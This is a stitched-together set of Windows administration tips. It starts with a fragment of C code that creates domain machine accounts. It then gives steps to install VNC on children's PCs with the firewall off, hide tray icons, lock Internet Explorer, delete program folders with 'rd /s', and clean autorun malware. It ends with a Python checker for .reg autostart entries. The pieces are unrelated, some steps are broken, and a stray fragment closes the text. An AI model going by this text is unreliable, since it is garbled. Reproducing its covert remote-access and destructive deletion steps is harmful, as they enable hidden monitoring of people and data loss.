    ui.usri1_comment = L"A virtual machine created by NetUserAdd()...";

    dwError = NetUserAdd(
        wTargetComputer,   // target computer name
        1,                 // info level
        (LPBYTE) &ui,      // buffer
        NULL
        );

    // Release the allocated memory.
    if(wAccount) HeapFree(GetProcessHeap(), 0, wAccount);

    // Indicate whether the function was successful.
    if(dwError == NO_ERROR)
    {
        printf("%ls computer account successfully created on %ls DC.\n", MachineAccount, wTargetComputer);
        return TRUE;
    }
    else
    {
        SetLastError(dwError);
        return FALSE;
    }
}

// This program runs at the command prompt and receives 2 arguments: the target server and the machine account name.
int wmain(int argc, wchar_t *argv[])
{
    if(argc != 3)
    {
        // argv[] holds wide strings, so print with %ls.
        printf("Usage: %ls <TargetComputer> <MachineAccount/Password>.\n", argv[0]);
        exit (-1);
    }

    DWORD AccountType = UF_WORKSTATION_TRUST_ACCOUNT;
    BOOL Test = AddMachineAccount(argv[1], argv[2], AccountType);
    printf("The return value is: %u\n", Test);
    return 0;
}

A sample output:

C:\myproject\win32prog\Debug>machineacct

Usage: machineacct <TargetComputer> <MachineAccount/Password>.

C:\myproject\win32prog\Debug>machineacct Mawar mymachine

Computer account type is valid.

Computer name length is valid.

Memory allocation is OK.

No truncation was done to the password, the length is OK, max is 14.

mymachine computer account successfully created on Mawar DC.

The return value is: 1

Verify our task.

Figure 10: MYMACHINE computer account has been created.

The user that calls the account management functions must have Administrator privilege on the target computer. In the case of existing computer accounts, the creator of the account can manage the account, regardless of administrative membership.

The SeMachineAccountPrivilege can be granted on the target computer to give specified users the ability to create computer accounts. This gives non-administrators the ability to create computer accounts. The caller needs to enable this privilege prior to adding the computer account.

------------------------User Accounts and Groups: Story and Program Examples, Part II-----------------------

Registry Key for Clear history of Remote Desktop Connections

Registry:

Start>Run>Regedit>OK

HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default

Then find the entry that you want to remove and delete it.

If you connect to the same PC all the time then you can also add this in as the default option to avoid having to use the dropdown each time.

VNC Remote access software

Download the "Windows Self Installing Package". After you have downloaded it, go to the offender's PCs and install the software, which is easy and simple. Install the "Server" component on the kids' PCs and the "Viewer" on your own PC.

After you have installed the software on the kids' PCs, click on the VNC icon at the bottom corner of the screen. It will ask you to put a password in the box and to confirm it in another box. Apply those settings and you're good to go. Don't forget to turn off the Windows Firewall or make an exception in it for VNC.

On your own PC, click on "VNC Viewer". This opens the viewer software, which asks for the IP address or computer name to connect to. You need to know which IP address the kids are on. There are many ways of finding this out. Here are some examples:

1.) Press Start, type "cmd" in the "Search programs and files" box and press Enter. A black box will appear. Type in "IPCONFIG /ALL" (don't forget there is a space in that command). It will show you a lot of output; you need the "IPv4 Address". It will probably be something like this: 192.168.1.3

2.) Another way is to go onto your router and find where it says "DHCP Leases". This shows who is connected or who has a lease on your router. ***This way is probably the best, as their IP address can change from time to time unless you change the lease time.***

Manually in Registry Editor to hide tray icon in the customize notification (it is at the bottom right)

NOTE: This will only turn on or off "Always show icons and notifications on the taskbar".

1. Open the Start Menu.

2. In the search box, type regedit and press Enter.

3. In regedit, navigate to the location below.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer

4. In the right pane, right click on EnableAutoTray and click on Modify.

5. To turn on "Always show all taskbar icons and notifications":

A) Type in 0 (zero) and click on OK.

B) Go to step 7.

6. To turn off "Always show all taskbar icons and notifications":

A) Type in 1 and click on OK.

7. Close Regedit.

8. Log off and log on, or restart the computer to apply the changes.

How to Cut Off and Lock Internet Explorer

Open your registry and find the key below.

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]

Change the value of "ProxyEnable" and set it to "1". Change the value of "ProxyServer" and set it to an IP address and port that is invalid on your network such as "10.0.0.1:5555" (i.e. "IP:Port").

By changing these settings, Internet access will be disabled for any applications that rely on the Microsoft proxy server information, such as Internet Explorer, Microsoft Office and the Opera browser.

To stop users from modifying the proxy settings add these restrictions to disable changes to the Internet configuration.

Find or create the key below:

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]

Create two DWORD values named "Connection Settings" and "Connwiz Admin Lock" and set them both to "1".

To remove the restriction, set the proxy settings back to their original values and delete the policy values.

Note: The change will take effect immediately for any new browser windows; existing Internet Explorer sessions will not be affected until the browser is closed and reopened.

 

How to Remove Programs with Delete Command Prompt

Author: Tomaz | Posted at: 4/18/2009 | Filed Under: tutorial |  

One of the tasks you can do using the command prompt is to completely uninstall every program on your computer. Of course it is far easier to use the standard Add/Remove feature or special third-party uninstallers, but in some rare cases there is no other way to uninstall a program than through the command prompt, for example when you have to boot a corrupted Windows installation with the so-called boot with command prompt option. Here we are going to take a look at how to uninstall CCleaner using the command prompt delete function.

Open Start>Run>cmd. Enter "cd %programfiles%" and press Enter. Type "dir /p" without quotes. You will now see the list of all your programs. To delete-uninstall CCleaner, type rd /s "CCleaner" and press "Y". This will permanently delete this program, so be sure this is what you want. You can delete any program using this method; just replace the name with what you want to delete.

Files on External/Flash Drive Changed to Shortcuts Virus

Issue

I caught a virus on my flash drive at work and it appears to have changed all my file names to shortcuts. I believe I've cleaned the virus, but how do I get my files back so that I can view them?

Solution

* If you did not format your flash drive, check whether the files are in hidden mode.
* Click on "Start" –> Run –> type cmd and click on OK.
* Check your external drive letter in My Computer.
* Here I assume your external drive is G:
* Enter this command:
* attrib -h -r -s /s /d g:*.*
* Delete the unnecessary shortcuts.

Note: Replace the letter g with your flash drive letter.

Kill Autorun

Step 1: Create a .bat file such as "KillAutorun.bat" and paste the code below into it.

attrib -r autorun.inf
del autorun.inf
md autorun.inf
attrib +r +h autorun.inf
Dissable_auto_run.reg

Step 2: Create the .reg file "Dissable_auto_run.reg" to stop Windows Auto run.

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveAutoRun"=dword:000000ff

; Delete the logon Run value that points at
; C:\WINDOWS\system32\windows32_rainster\myslides.exe ("=-" removes a value).
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Policies"=-

Step 3: Place both files (Dissable_auto_run.reg and KillAutorun.bat) in the USB root. Execute (double click) KillAutorun.bat.

Step 4: Assume the USB drive letter is "I:". Open I:\RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\. This folder will contain some exe file, e.g. myslides.exe. Create one batch file the same way as in Step 1, e.g. create a .bat file such as "KillAutorun.bat" and paste the code below into it.

attrib -r myslides.exe
del myslides.exe
md myslides.exe
attrib +r +h myslides.exe

Run this bat file from "I:\RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\".

Note: The folder name S-1-5-21-1482476501-3352491937-682996330-1013 will differ from one system to another.

Thanks and Regards Rajesh Natarajan MCDBA India
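
A hex(2) value in a .reg file is just a path stored as bytes, and a file exported from an infected machine can carry the malware's own Run entry, so a file like Dissable_auto_run.reg is worth decoding before it is imported. The Python below is an added example, not part of the original post: the function names are my own, the sample is the Policies\Explorer\Run entry for myslides.exe written as a REGEDIT4 hex(2) value, and ANSI data is assumed to be cp1252.

```python
import re

# Constructed sample: a REGEDIT4 file with one DWORD policy and one hex(2)
# (REG_EXPAND_SZ) value split over continuation lines, as regedit writes it.
SAMPLE_REG = r'''REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveAutoRun"=dword:000000ff

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Policies"=hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,\
  77,69,6e,64,6f,77,73,33,32,5f,72,61,69,6e,73,74,65,72,5c,6d,79,73,6c,69,64,\
  65,73,2e,65,78,65,00
'''

# Keys whose values are launched automatically at logon.
AUTOSTART_KEY = re.compile(r"\\(Run|RunOnce|RunServices)$", re.IGNORECASE)
VALUE_LINE = re.compile(r'^(?:"(?P<name>[^"]*)"|@)=(?P<data>.*)$')
HEX_DATA = re.compile(r"^hex(?:\((?P<type>[0-9a-fA-F]+)\))?:(?P<bytes>.*)$")


def join_continuations(text):
    """Merge lines that end in a backslash with the line that follows."""
    out, pending = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            pending += line[:-1]
            continue
        out.append(pending + line)
        pending = ""
    if pending:
        out.append(pending)
    return out


def decode_hex_value(reg_type, byte_text, unicode_export):
    """Turn the comma-separated bytes of a hex value into readable text."""
    data = bytes(int(b, 16) for b in byte_text.split(",") if b.strip())
    if reg_type in (1, 2, 7):  # REG_SZ, REG_EXPAND_SZ, REG_MULTI_SZ
        # "Windows Registry Editor Version 5.00" stores UTF-16LE; REGEDIT4 is ANSI.
        codec = "utf-16-le" if unicode_export else "cp1252"
        return data.decode(codec, errors="replace").rstrip("\x00")
    return data.hex()  # REG_BINARY and other types: show the raw bytes


def audit_reg(text):
    """Return every hex-encoded value with its decoded content and key."""
    lines = join_continuations(text)
    unicode_export = bool(lines) and lines[0].startswith("Windows Registry Editor")
    key, findings = None, []
    for line in lines:
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        value = VALUE_LINE.match(line)
        if not value or key is None:
            continue
        hexdata = HEX_DATA.match(value.group("data"))
        if not hexdata:
            continue  # plain strings and dwords are already readable
        reg_type = int(hexdata.group("type"), 16) if hexdata.group("type") else 3
        findings.append({
            "key": key,
            "name": value.group("name") or "(Default)",
            "decoded": decode_hex_value(reg_type, hexdata.group("bytes"), unicode_export),
            "autostart": bool(AUTOSTART_KEY.search(key)),
        })
    return findings


if __name__ == "__main__":
    for f in audit_reg(SAMPLE_REG):
        flag = "AUTOSTART" if f["autostart"] else "value"
        print(f"[{flag}] {f['key']} :: {f['name']} = {f['decoded']}")
```

Any finding flagged as autostart is a program the import would register to run at logon, so it should be understood before the file is merged.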

 

 

  

 

33. A:1, B:2, C:4, D:8, E:16, F:32, G:64 ,H:128, I:256, J:512,

K:1024, Z:33554432